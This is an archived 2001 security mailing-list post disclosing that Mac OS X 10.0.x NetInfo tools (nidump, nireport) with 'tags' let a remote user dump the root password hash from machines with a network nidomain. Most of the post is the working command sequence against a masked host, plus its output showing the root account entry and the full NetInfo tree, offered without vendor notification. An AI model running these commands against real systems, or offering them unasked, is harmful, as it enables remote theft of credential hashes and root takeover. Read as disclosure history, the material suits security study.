OSX remote root

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 




I have seen mention of nidump being used local to an OSX box to take
root... I have found that with the use of "tags" it is also a remote
root. I have not notified apple due to the fact that they did nothing 
about the original local
exploit. Any machine with a "network" nidomain is vulnerable. It may
also be possible to spoof a connect to the "local" domain however I have 
not tested this.
-KF

bugtraq id	2953
object	nidump
class	Design Error
cve	CVE-MAP-NOMATCH
remote	No
local	Yes
published	Jun 26, 2001
updated	Sep 04, 2001
vulnerable	Apple MacOS X 10.0
Apple MacOS X 10.0.1
Apple MacOS X 10.0.2
Apple MacOS X 10.0.3
Apple MacOS X 10.0.4

the above needs updated to remote Yes

[dhcpxxx:~] elguapo% nidomain -l xxx.xxx.net
tag=network udp=797 tcp=798
tag=local udp=795 tcp=796

[dhcpxxxxxx:~] elguapo% nidump -t xxx.xxx.net/network passwd
root:xxxxxxxx.:0:0::0:0:System Administrator:/private/var/root:/bin/tcsh

[dhcpxxx:~] elguapo% nireport -t xxx.xxx.net/network /users name uid
passwd
root    0       xxxxxxxxx.

[dhcpxxxx:~] elguapo% nidump -r / -t xxx.xxxx.net/network
{
     "master" = ( "localhost/network" );
     CHILDREN = (
       {
         "name" = ( "machines" );
         CHILDREN = (
           {
             "name" = ( "localhost" );
             "ip_address" = ( "xxx.xxx.xxx.xxx" );
             "serves" = ( "./network", "localhost/local" );
           }
         )
       },
       {
         "name" = ( "users" );
         CHILDREN = (
           {
             "name" = ( "root" );
             "passwd" = ( "xxxxxxxxx." );
             "uid" = ( "0" );
             "gid" = ( "0" );
             "change" = ( "0" );
             "expire" = ( "0" );
             "realname" = ( "System Administrator" );
             "home" = ( "/private/var/root" );
             "shell" = ( "/bin/tcsh" );
           }
         )
       },
       {
         "name" = ( "groups" );
         CHILDREN = (
           {
             "name" = ( "nobody" );
             "gid" = ( "-2" );
             "passwd" = ( "*" );
           },
           {
             "name" = ( "nogroup" );
             "gid" = ( "-1" );
             "passwd" = ( "*" );
           },
           {
             "passwd" = ( "*" );
             "name" = ( "wheel" );
             "gid" = ( "0" );
             "users" = ( "xxxxx" );
           },
           {
             "name" = ( "daemon" );
             "gid" = ( "1" );
             "passwd" = ( "*" );
             "users" = ( "root" );
           },
           {
             "name" = ( "kmem" );
             "gid" = ( "2" );
             "passwd" = ( "*" );
             "users" = ( "root" );
           },
           {
             "name" = ( "sys" );
             "gid" = ( "3" );
             "passwd" = ( "*" );
             "users" = ( "root" );
           },
           {
             "name" = ( "tty" );
             "gid" = ( "4" );
             "passwd" = ( "*" );
             "users" = ( "root" );
           },
           {
             "name" = ( "operator" );
             "gid" = ( "5" );
             "passwd" = ( "*" );
             "users" = ( "root" );
           },
           {
             "name" = ( "mail" );
             "gid" = ( "6" );
             "passwd" = ( "*" );
           },
           {
             "name" = ( "bin" );
             "gid" = ( "7" );
             "passwd" = ( "*" );
           },
           {
             "name" = ( "staff" );
             "gid" = ( "20" );
             "passwd" = ( "*" );
             "users" = ( "root" );
           },
           {
             "name" = ( "guest" );
             "gid" = ( "31" );
             "passwd" = ( "*" );
             "users" = ( "root" );
           },
           {
             "name" = ( "utmp" );
             "gid" = ( "45" );
             "passwd" = ( "*" );
           },
           {
             "name" = ( "uucp" );
             "gid" = ( "66" );
             "passwd" = ( "*" );
           },
           {
             "name" = ( "dialer" );
             "gid" = ( "68" );
             "passwd" = ( "*" );
           },
           {
             "name" = ( "network" );
             "gid" = ( "69" );
             "passwd" = ( "*" );
           },
           {
             "name" = ( "www" );
             "gid" = ( "70" );
             "passwd" = ( "*" );
           },
           {
             "passwd" = ( "*" );
             "name" = ( "admin" );
             "gid" = ( "80" );
             "users" = ( "xxxxxx" );
           },
           {
             "name" = ( "unknown" );
             "gid" = ( "99" );
             "passwd" = ( "*" );
           }
         )
       },
       {
         "name" = ( "aliases" );
       },
       {
         "name" = ( "fax_modems" );
       },
       {
         "name" = ( "mounts" );
       },
       {
         "name" = ( "printers" );
       }
     )
}


[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux